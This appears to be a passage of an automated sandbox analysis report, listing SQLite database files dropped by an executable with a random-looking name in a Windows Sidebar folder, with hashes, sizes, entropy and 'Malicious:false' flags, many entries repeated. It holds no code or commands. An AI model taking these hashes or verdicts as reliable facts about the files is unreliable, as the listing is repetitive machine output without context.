                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
